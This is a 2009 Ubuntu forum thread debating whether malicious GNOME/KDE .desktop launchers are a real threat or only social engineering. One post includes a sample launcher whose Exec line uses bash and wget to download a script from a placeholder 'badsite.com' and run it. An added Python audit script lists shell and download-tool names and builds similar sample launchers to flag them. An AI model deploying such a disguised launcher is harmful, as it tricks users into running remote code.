[all variants] Malware Threat To GNOME and KDE



deepclutch
February 18th, 2009, 09:19 PM
Blogger "foobar" has written a followup article (http://www.geekzone.co.nz/foobar/6236) on the How to write a Linux virus in 5 easy steps article, which was mentioned on LWN here (http://lwn.net/Articles/318755/). "Yesterday I published an article about How to write a Linux virus in 5 easy steps. There has been quite an overwhelming response for this. Within just a few hours this article became my most visited blog post ever. Wow! Just goes to show that either the article hit a real nerve, or the other articles on my blog are just really boring. :-)"

http://lwn.net/Articles/319072/
--
"foobar posted on his blog recently about 'How to write a Linux virus in 5 easy steps (http://www.geekzone.co.nz/foobar/6229),' detailing potential malware infection risks in the .desktop file format used by GNOME and KDE. This is not a new threat, and it appears to still be a risk, as discussions in 2006 (http://archive.netbsd.se/?ml=xorg-xdg&a=2006-03&t=2724527) did not seem to come to any firm conclusion on how to deal with the problem." There's a followup on LWN (http://lwn.net/Articles/319072/).
http://it.slashdot.org/article.pl?sid=09/02/17/1526244

--
People - will they never fix this issue?
Of course, it is NOT a Ubuntu or GNU/Linux problem. It is with desktop environments, be it GNOME, KDE, Xfce or LXDE. There is no word I hear from the GNOME mailing list (show me?).
http://archive.netbsd.se/?ml=xorg-xdg&a=2006-03&t=2724527

cariboo907
February 18th, 2009, 09:40 PM
There is nothing to fix, the malware in the article depends on social engineering, and I don't think that the devs can fix stupidity.

Jim

W2IBC
February 18th, 2009, 09:48 PM
> There is nothing to fix, the malware in the article depends on social engineering, and I don't think that the devs can fix stupidity.
>
> Jim

just like that one comedian Ron White said "You can't fix stupid"

I think MOST Linux users know enough to keep themselves from getting so called "owned"

deepclutch
February 18th, 2009, 09:51 PM
Social engineering? Huh? Remember - Linux, with Ubuntu, is touting as idiot friendly; right? Some effort? If ever, something like AppArmor comes useful in a problem like this.

sonofusion82
February 18th, 2009, 09:54 PM
> just like that one comedian Ron White said "You can't fix stupid"
>
> I think MOST Linux users know enough to keep themselves from getting so called "owned"

While I agree that most Linux users are more well informed, this is not the attitude we need if we want to spread Linux and increase its install base. If I install Ubuntu on my mum's machine, I would expect it to be safe enough for her to use without the need to give her an extensive computer security briefing.

Therion
February 18th, 2009, 10:01 PM
As long as people interface with computers there will be vulnerabilities. Period. Full stop. End of discussion.

No Operating System that yet exists can replace the one between your ears that implements, or fails to implement, basic safe-computing habits.

cdenley
February 18th, 2009, 10:26 PM
I think gnome and KDE should require launchers to be executable before it executes any commands in it. This way, even if the user downloaded a malicious launcher, it wouldn't do anything until the user made it executable, just as if it were a script. This way, the user knows that double-clicking a file they download will not execute anything, unless they make it executable, as many users may incorrectly assume at the moment.

By the way, if you don't want to read the entire article, here is a summary:


<?php
header("Content-Type: application/octet-stream");
header('Content-Disposition: attachment; filename="innocent"');
?>
[Desktop Entry]
Version=1.0
Encoding=UTF-8
Name=malware
Type=Application
Terminal=false
Icon[en_US]=gnome-panel-launcher
Exec=bash -c "wget -O ~/.malware.sh http://badsite.com/malware.sh;sh ~/.malware.sh"
Name[en_US]=malware
Icon=gnome-panel-launcher

sonofusion82
February 18th, 2009, 10:48 PM
> As long as people interface with computers there will be vulnerabilities. Period. Full stop. End of discussion.
>
> No Operating System that yet exists can replace the one between your ears that implements, or fails to implement, basic safe-computing habits.

The idea is to reduce mistakes. Even computer security experts may occasionally make mistakes.

If you depend purely on your "safe-computing habits", why not just run the entire desktop Linux with just the root account and tell everyone to just practice safe-computing habits?

It is like telling everyone not to do crime because it is bad and just practise personal safety habits and forget about police and law enforcement. It just doesn't work.

to quote Einstein, "Two things are infinite: the universe and human stupidity; and I'm not sure about the universe." ;)

cdenley
February 18th, 2009, 10:49 PM
I didn't vote because there is no option to indicate "not a serious threat, but can be improved".

http://brainstorm.ubuntu.com/idea/18130/image/1/ (http://brainstorm.ubuntu.com/idea/18130/)

doas777
February 18th, 2009, 10:54 PM
as everyone on /. pointed out, the real problem is not that the user is 'stupid', but that .desktop files are executable even when set to -x . To me, that is a problem that should be addressed.

now, which sounds stupider, a user opening an attachment, or a developer knowing full well, but refusing to honor the longstanding conventions in relation to file system security?
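
As an added illustration of the two posts above (cdenley's proposal that launchers must be executable before their commands run, and doas777's point that .desktop files currently run without the execute bit), here is a small audit script that is not part of the original thread. It reads the Exec= line of a launcher and reports when the file lacks +x or when the command goes through a shell or a download tool; the name lists, the finding labels and the sample launchers are constructed assumptions.

```python
import os, re, stat, tempfile

# Assumed name lists for this example; extend to match local policy.
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}
FETCHERS = {"wget", "curl"}

def parse_exec(path):
    """Return the Exec= value from the [Desktop Entry] group, or None."""
    in_group = False
    with open(path, encoding="utf-8", errors="replace") as fh:
        for raw in fh:
            line = raw.strip()
            if line.startswith("["):
                in_group = line == "[Desktop Entry]"
            elif in_group and "=" in line:
                key, _, value = line.partition("=")
                if key.strip() == "Exec":
                    return value.strip()
    return None

def audit_launcher(path):
    """List reasons a launcher deserves a closer look (empty list = none)."""
    cmd = parse_exec(path)
    if cmd is None:
        return []
    findings = []
    # The convention the thread asks desktops to honour: no +x, no execution.
    if not os.stat(path).st_mode & stat.S_IXUSR:
        findings.append("exec-without-x-bit")
    names = {os.path.basename(t) for t in re.findall(r"[\w./~-]+", cmd)}
    if names & SHELLS:
        findings.append("invokes-shell")
    if names & FETCHERS:
        findings.append("fetches-remote-content")
    return findings

def demo():
    """Audit two constructed launchers: one as-downloaded, one installed."""
    d = tempfile.mkdtemp()
    samples = {  # constructed sample data, not taken from a real system
        "innocent": (0o644, 'Exec=bash -c "wget -O ~/.x.sh http://example.invalid/x.sh;sh ~/.x.sh"'),
        "editor.desktop": (0o755, "Exec=gedit %U"),
    }
    results = {}
    for name, (mode, exec_line) in samples.items():
        path = os.path.join(d, name)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write("[Desktop Entry]\nType=Application\nName=sample\n" + exec_line + "\n")
        os.chmod(path, mode)
        results[name] = audit_launcher(path)
    return results
```

Pointing audit_launcher() at the files in a download directory gives a quick list of launchers that would run a command despite never having been marked executable.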

Therion
February 18th, 2009, 10:55 PM
> the idea is to reduce mistakes.

Where exactly is the coding mistake in this instance?

The article itself states:
> ...there is nothing fundamental about the architecture of Linux that prevents user stupidity or ignorance, which is of course the main ingredient in any attack vector like this.

Furthermore...
> There is just one small stumbling block, which needs to be overcome. Well, two, actually.

Finally...
> And here then is one more step that needs to be taken by the user, which might reduce the success rate of this attack vector a little. The user has to first save the attachment and then double click on it.

This isn't a coding issue; this is PEBCAK: Problem Exists Between Chair And Keyboard. Remove any single user error, and there's plenty to choose from it seems, and this attack fails.

Utterly... FAILS.

matteojg
February 18th, 2009, 11:15 PM
Granted the premise concerning the vulnerability of launchers in the KDE or GNOME desktops...how is it that the script that is downloaded by the launcher becomes executable?

cdenley
February 18th, 2009, 11:29 PM
> Granted the premise concerning the vulnerability of launchers in the KDE or GNOME desktops...how is it that the script that is downloaded by the launcher becomes executable?

It doesn't need to be executable if you execute the shell directly with the script as an argument.

bodhi.zazen
February 19th, 2009, 12:28 AM
I am going to close this thread now as it is not a very productive discussion. The previous discussion was closed, and that does not mean you may start a new one.

Please see the sticky on the top of these forums and please do not spam these forums with links to personal web pages.

If you wish to cite an authority on security that would be fine, but the author of those pages is certainly not an authority and your linking to his blog / opinion page borders on spam.

The sticky addresses both issues you raise:

1. Social engineering => educate users.

2. Escalation of privileges. This requires #1 and you are already in deep trouble if you are limiting escalation of privileges. The current tools to allow this are apparmor and selinux, both of which are quite powerful.